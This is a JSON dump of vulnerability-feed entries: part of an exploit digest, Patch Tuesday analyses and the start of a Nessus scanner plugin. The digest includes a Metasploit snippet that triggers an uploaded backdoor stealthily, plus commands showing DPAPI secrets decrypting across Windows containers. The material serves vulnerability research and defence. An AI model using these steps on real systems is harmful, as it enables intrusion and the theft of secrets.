uploaded!')\n\nThen use the `OPTIONS` request to trigger the backdoor. Technically this could be any other HTTP method including invalid ones like `BACKDOOR`, but for the stealth you better use a legit one. \n \n \n send_request_cgi( 'method' => 'OPTIONS', 'uri' => normalize_uri(target_uri.path, 'logupload') ) ...\n\n### The second place in this category goes here: \n\n[**Win32k ConsoleControl Offset Confusion**](<https://vulners.com/packetstorm/PACKETSTORM:161880>)\n\n[CVE-2021-1732](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1732>),[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>) \n**Score: CVSS 7.2 \nMetasploit +**\n \n \n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. \n\nThe flaw exists in how the `WndExtra` field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. \n\n* * *\n\n## \n\n## II. The Geek of the Week\n\nIn our not so humble opinion, this one is the coolest thing we saw last week. It is all about Windows Docker Information Disclosure Vulnerability, and since we love our Docker containers, so\n\n### The title goes to this exploit:\n\n[**Microsoft Windows Containers DP API Cryptography Flaw**](<https://vulners.com/packetstorm/PACKETSTORM:161816>)\n\n[CVE-2021-1645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1645>) \n**Score: CVSS 6.1 \nMetasploit +**\n \n \n The Windows Data Protection API (DP API) allows applications to encrypt arbitrary data without managing keys. You can pass any data to the API, and it then returns an encrypted blob, or you can reverse an encrypted blob with DP API to recover the plain text. The cryptographic key used is either tied to the user context or is unique to a machine. There was a design issue with DP API in containers which resulted in DP API using the same key in all Windows containers. Additionally, these keys were public in base-image layers published by Microsoft.\n\nThe above vulnerability applies to both user- and machine-key DP API encryption within Windows Docker containers, we used the machine key encryption in our explanations. Typically, a machine key is tied to a (virtual-)machine. Therefore, a machine is not capable of decrypting data encrypted by an application on another device. However, due to a design matter, DP API machine keys used in containers came from the container images. Since Windows Docker images are based on identical base images, the containers\u2019 DP API keys were the same. As long as the base image is public, the DP API keys were public also.\n\nTherefore, DP API operations performed by any Windows container application were ineffective, as the encryption key that was used is public. That is why organizations that used DP API in Windows Docker containers and relied on it to store encrypted data are in a potentially insecure location and should consider this data as compromised.\n\nLets&#x27; see how to make this exploit work. First, start a docker container called Alice on VM1:\n \n \n \\$ docker run --name Alice -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThen, encrypt a file in the Alice container using the powershell script `vault.ps1`: \n \n \n C:\\>powershell.exe -File vault.ps1 -StoreSecret \"This is my secret text\" secret.txt\n C:\\>type secret.txt AQAAA...vJ8aUP9 \n\nStart a docker container Bob on VM2:\n \n \n \\$ docker run --name Bob -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThe next command shows that the file encrypted by Alice on VM1 can be decrypted in the Bob container on VM2:\n \n \n C:\\>powershell.exe -File vault.ps1 secret.txt This is my secret text\n\nNext use the `vault.ps1` PowerShell script from <https://blag.nullteilerfrei.de/2018/01/05/powershell-dpapi-script/>.\n\n* * *\n\n## Other hi-scored exploits published this week: \n\n[**SonLogger 4.2.3.3 Shell Upload (Unauthenticated Arbitrary File Upload)**](<https://vulners.com/packetstorm/PACKETSTORM:161793>)\n\n[CVE-2021-27964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27964>) \n**Score: CVSS 7.5 \nMetasploit +**\n \n \n This module exploits an unauthenticated arbitrary file upload via insecure POST request.\n\n**[Microsoft Exchange 2019 SSRF / Arbitrary File Write](<https://vulners.com/packetstorm/PACKETSTORM:161846>)**\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) \n**Score: 7.5**\n \n \n This one exploits an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources - one of the four zero-day vulnerabilities in MS Exchange discovered in March.\n\n[**CuteNews 2.1.2 Shell Upload**](<https://vulners.com/packetstorm/PACKETSTORM:161833>)\n\n[CVE-2019-11447](<https://vulners.com/cve/CVE-2019-11447>) \n**Score: CVSS 6.5**\n \n \n An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal.\n\n[**LiveZilla Server 8.0.1.0 Cross Site Scripting**](<https://vulners.com/packetstorm/PACKETSTORM:161867>)\n\n[CVE-2019-12962](<https://vulners.com/cve/CVE-2019-12962>) \n**Score: CVSS 4.3**\n \n \n LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.\n\nThe post [Weekly exploit digest - March, 15-21 - VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API](<https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-21T13:09:00", "type": "wallarmlab", "title": "Weekly exploit digest \u2013 March, 15-21 \u2013 VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-11447", "CVE-2019-12962", "CVE-2021-1645", "CVE-2021-1732", "CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27964"], "modified": "2021-03-21T13:09:00", "id": "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "href": "https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-01-19T21:27:02", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for January 2022. Traditionally, I will use my open source Vulristics tool for analysis. This time I didn&#x27;t make any changes to how connectors work. The report generation worked correctly on the first try.\n\n`python3.8 vulristics.py --report-type \"ms_patch_tuesday\" --mspt-year 2022 --mspt-month \"January\" --rewrite-flag \"True\"`\n\nThe only thing I have improved is the detection of types of vulnerabilities and vulnerable products. &quot;Unknown Vulnerability Type&quot; was for two vulnerabilities, so I added the &quot;Elevation Of Privilege&quot; \u0438 &quot;Cross-Site Scripting&quot; spelling options. I added detections for 13 products and 19 Windows components. I also corrected the method for sorting vulnerabilities with the same Vulristics score. Previously, such vulnerabilities were sorted by CVE id, now they are sorted by vulnerability type and product. This allows you to see the clusters of similar vulnerabilities.\n\nEach time I rebuilt the report with the same command, but without recollecting the data:\n\n`python3.8 vulristics.py --report-type \"ms_patch_tuesday\" --mspt-year 2022 --mspt-month \"January\" --rewrite-flag \"False\"`\n\nThe full report is available here:\n\n[ms_patch_tuesday_january2022_report_with_comments_ext_img.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_january2022_report_with_comments_ext_img.html>)\n\nlet&#x27;s now look at the report. There are 97 vulnerabilities in total. \n\nIf we only look at CVSS:\n\n * Critical: 6\n * High: 63\n * Medium: 28\n * Low: 0\n\nBut according to my Vulrisitcs Vulnerability Score, everything is not so critical:\n\n * Urgent: 0\n * Critical: 1\n * High: 34\n * Medium: 62\n * Low: 0\n\nThe only critical vulnerability became so much after the publication of Patch Tuesday. **Elevation of Privilege** - Windows Win32k (CVE-2022-21882). A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver. Exploitation in the wild is mentioned at Microsoft. None of the Vulnerability Management vendors mentioned this vulnerability in their reviews. \n\nNow let&#x27;s see the High vulnerabilities.\n\n**Remote Code Execution** - HTTP Protocol Stack (CVE-2022-21907). This vulnerability is highlighted by all VM vendors, except for some reason Rapid7. To exploit this vulnerability an unauthenticated attacker could send a specially crafted packet to a vulnerable server utilizing the HTTP Protocol Stack (http.sys) to process packets. No user interaction, no privileges required. Microsoft warns that this flaw is considered wormable and has a flag \u201cExploitation More Likely\u201d. According to the advisory, Windows Server 2019 and Windows 10 version 1809 do not have the HTTP Trailer Support feature enabled by default, however this mitigation does not apply to other affected versions of Windows. While this is definitely more server-centric vulnerability, remember that Windows clients can also run http.sys, so all affected versions are affected by this bug.\n\n**Remote Code Execution** - Remote Procedure Call Runtime (CVE-2022-21922). Microsoft Remote Procedure Call (RPC) defines a powerful technology for creating distributed client/server programs. The RPC run-time stubs and libraries manage most of the processes relating to network protocols and communication. The authenticated attacker with non-admin credentials could take advantage of this vulnerability to execute malicious code through the RPC runtime. It looks like an interesting vulnerability for lateral movement in infrastructure. But for some reason, VM vendors ignored this vulnerability.\n\n**Remote Code Execution** - Microsoft Exchange (CVE-2022-21969, CVE-2022-21846 and CVE-2022-21855). 3 vulnerabilities with the same severity level. Exchange vulnerabilities are always interesting because Exchange servers are usually accessible from the Internet. But this time, these vulnerabilities are less critical. They cannot be exploited directly over the public internet (attackers need to be \u201cadjacent\u201d to the target system in terms of network topology).\n\n**Remote Code Execution** - Windows Remote Desktop Client (CVE-2022-21850, CVE-2022-21851) and **Remote Code Execution** - Windows Remote Desktop Protocol (CVE-2022-21893). For all CVEs, an attacker would need to convince a user on an affected version of the Remote Desktop Client to connect to a malicious RDP server. \n\n**Remote Code Execution** - Windows IKE Extension (CVE-2022-21849). Internet Key Exchange is the protocol used to set up a security association (SA) in the IPsec protocol suite. While at this time the details of this vulnerability are limited, a remote attacker could trigger multiple vulnerabilities when the IPSec service is running on the Windows system without being authenticated. \n\nI would also like to draw attention to these vulnerabilities:\n\n**Remote Code Execution** - Microsoft SharePoint (CVE-2022-21837). An attacker can use this vulnerability to gain access to the domain and could perform remote code execution on the SharePoint server to elevate themselves to SharePoint admin.\n\n**Remote Code Execution** - Microsoft Office (CVE-2022-21840) and **Remote Code Execution** - Microsoft Word (CVE-2022-21842). Exploitation would require social engineering to entice a victim to open an attachment or visit a malicious website \u2013 thankfully the Windows preview pane is not a vector for this attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-16T20:17:20", "type": "avleonov", "title": "Microsoft Patch Tuesday January 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21837", "CVE-2022-21840", "CVE-2022-21842", "CVE-2022-21846", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21855", "CVE-2022-21882", "CVE-2022-21893", "CVE-2022-21907", "CVE-2022-21922", "CVE-2022-21969"], "modified": "2022-01-16T20:17:20", "id": "AVLEONOV:D630CE92574B03FCC2E79DCA5007AAFC", "href": "https://avleonov.com/2022/01/16/microsoft-patch-tuesday-january-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-26T00:33:35", "description": "Hello everyone! It has been 3 months since [my last review of Microsoft vulnerabilities for Q4 2020](<https://avleonov.com/2021/01/11/vulristics-vulnerability-score-automated-data-collection-and-microsoft-patch-tuesdays-q4-2020/>). In this episode I want to review the Microsoft vulnerabilities for the first quarter of 2021. There will be 4 parts: January, February, March and the vulnerabilities that were released between the Patch Tuesdays.\n\n\n\nI will be using the reports that I created with my [Vulristics tool](<https://github.com/leonov-av/vulristics>). This time I&#x27;ll try to make the episodes shorter. I will describe only the most critical vulnerabilities. Links to the full reports are at the bottom of the blog post.\n\n## January 2021\n\n * All vulnerabilities: 83\n * Urgent: 0\n * Critical: 1\n * High: 28\n * Medium: 51\n * Low: 3\n\nSo, what was interesting in January. The only critical vulnerability was Microsoft Defender Remote Code Execution (CVE-2021-1647). &quot;Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized.&quot;\n\nThe most interesting High level vulnerability is Microsoft splwow64 Elevation of Privilege (CVE-2021-1648). &quot;According to Maddie Stone, a researcher at Google Project Zero credited with identifying this vulnerability, CVE-2021-1648 is a patch bypass for CVE-2020-0986, which was exploited in the wild as a zero-day.&quot;\n\nAlso, vendors paid attention to a large number of Remote Procedure Call Runtime Remote Code Executions (CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701) and Windows Remote Desktop Security Feature Bypass (CVE-2021-1669). But there are still no signs of exploitation for them. They are all labeled High in the Vulristics report.\n\nThere were no public exploits for any of the January vulnerabilities. January was a quiet and calm month.\n\n## February 2021\n\n * All vulnerabilities: 57\n * Urgent: 1\n * Critical: 2\n * High: 21\n * Medium: 31\n * Low: 2\n\nOne Urgent level vulnerability is Elevation of Privilege in Win32k component of Windows 10 and Windows Server 2019 (CVE-2021-1732). According to Microsoft, this vulnerability has been exploited in the wild. &quot;Successful exploitation would elevate the privileges of an attacker, potentially allowing them to create new accounts, install programs, and view, modify or delete data&quot;. Public exploit in a form of Metasploit Module is found at Vulners ([Win32k ConsoleControl Offset Confusion](<https://vulners.com/packetstorm/packetstorm:161880>)).\n\nBut the situation with other critical vulnerabilities is interesting. None of the VM vendors mentioned them in their Patch Tuesday reviews.\n\n * This is Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-24085), which is mentioned on [AttackerKB](<https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085>) and for which public exploit is found at Vulners ([Microsoft Exchange Server msExchEcpCanary CSRF / Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161528>)). This is not the same vulnerability that was exploited in HAFNIUM. We&#x27;ll get to those vulnerabilities later.\n * Two other vulnerabilities, Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1698) and Microsoft Exchange Server (CVE-2021-1730), were exploitated in the wild. Therefore, the Vulristics Vulnerability Score is higher for them.\n\nIf vendors ignored these vulnerabilities, what vulnerabilities did they mention in their reports? \n\n * Primarily they wrote about Windows TCP/IP Remote Code Execution Vulnerabilities. &quot;Microsoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074 and CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). While there is no evidence that these vulnerabilities are exploited in wild, these vulnerabilities should be prioritized given their impact.&quot;\n * Also about Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-24078). &quot;RCE flaw within Windows server installations when configured as a DNS server. Affecting Windows Server versions from 2008 to 2019, including server core installations, this severe flaw is considered \u201cmore likely\u201d to be exploited and received a CVSSv3 score of 9.8. This bug is exploitable by a remote attacker with no requirements for user interaction or a privileged account. As the vulnerability affects DNS servers, it is possible this flaw could be wormable and spread within a network.&quot;\n\nBut for these 2 vulnerabilities, there are still no public exploits or signs of active exploitation in the wild. This, of course, does not mean that these vulnerabilities do not need to be fixed. When we see the exploitation of these vulnerabilities the wild, it will be a disaster.\n\n## March 2021\n\n * All vulnerabilities: 82\n * Urgent: 0\n * Critical: 0\n * High: 36\n * Medium: 43\n * Low: 3\n\nAnd again, we see in the top not exactly the same vulnerabilities that VM vendors pointed out in their reviews.\n\n * Windows Container Execution Agent Elevation of Privilege Vulnerability (CVE-2021-26891). Just because a public exploit was found at Vulners ([Microsoft Windows Containers Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161734>)). \n * Internet Explorer Memory Corruption (CVE-2021-26411). &quot;A memory corruption vulnerability in Internet Explorer that was exploited in the wild as a zero-day. In order to exploit the flaw, an attacker would need to host the exploit code on a malicious website and convince a user through social engineering tactics to visit the page, or the attacker could inject the malicious payload into a legitimate website&quot;. Exploitation in the wild is mentioned at [AttackerKB](<https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411>).\n\nBut we also see several Windows DNS Server Remote Code Executions . &quot;All five of these CVEs were assigned 9.8 CVSSv3 scores and can be exploited by an unauthenticated attacker when dynamic updates are enabled. According to an analysis by researchers at McAfee, these CVEs are not considered \u201cwormable,\u201d yet they do evoke memories of CVE-2020-1350 (SIGRed), a 17-year-old wormable flaw patched in July 2020.&quot; In general, updating DNS Server is never a bad thing.\n\nAnd where is the most important thing? Naturally these are Exchange vulnerabilities and they were published between Patch Tuesdays. I made a special script to get such CVEs.\n\n## Other Q1 2021\n\n * All vulnerabilities: 85\n * Urgent: 0\n * Critical: 7\n * High: 5\n * Medium: 27\n * Low: 46\n\nThe 7 critical vulnerabilities are those Microsoft Exchange Server Remote Code Executions exploited in recent attacks. They have signs of exploitation in the wild at [AttackerKB](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855>) and [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). However, we still don&#x27;t see public exploits.\n\n&quot;[ProxyLogon](<https://proxylogon.com/>) is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution. All affected components are vulnerable by default! As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an only opened 443 port!&quot;\n\nEverything is extremely serious with these vulnerabilities and if you have public unpatched Exchange servers, then there is a good chance that you have already been hacked. For example, by HAFNIUM.\n\n&quot;Hafnium is a state-sponsored threat actor identified by the Microsoft Threat Intelligence Center (MSTIC)&quot;.\n\n&quot;Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. To date, Hafnium is the primary actor we\u2019ve seen use these exploits, which are discussed in detail [by MSTIC here](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what\u2019s called a web shell to control the compromised server remotely. Third, it would use that remote access \u2013 run from the U.S.-based private servers \u2013 to steal data from an organization\u2019s network.&quot;\n\nIn short, these Exchange vulnerabilities are the top.\n\nThe rest are Chrome vulnerabilities, simply because Microsoft&#x27;s browser is now based on Chrome.\n\nYou can download full versions of reports here:\n\n * [ms_patch_tuesday_january2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_january2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_february2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_february2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_march2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_march2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_other_Q1_2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_other_Q1_2021_report_avleonov_comments.html>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-26T02:47:52", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q1 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1350", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1664", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1698", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1730", "CVE-2021-1732", "CVE-2021-24074", "CVE-2021-24078", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26891", "CVE-2021-27065"], "modified": "2021-03-26T02:47:52", "id": "AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "href": "http://feedproxy.google.com/~r/avleonov/~3/poQoyaBweKg/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-21T14:26:20", "description": "The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24083, CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601354: Windows 10 Version 1803 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-24111", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601354.NASL", "href": "https://www.tenable.com/plugins/nessus/146339", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146339);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-24111\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601354\");\n script_xref(name:\"MSFT\", value:\"MS21-4601354\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0079-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601354: Windows 10 Version 1803 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24083,\n CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601354-os-build-17134-2026-04614869-9ce5-cc3b-655a-bc66eb7cb4b0\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbcfd44b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601354.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 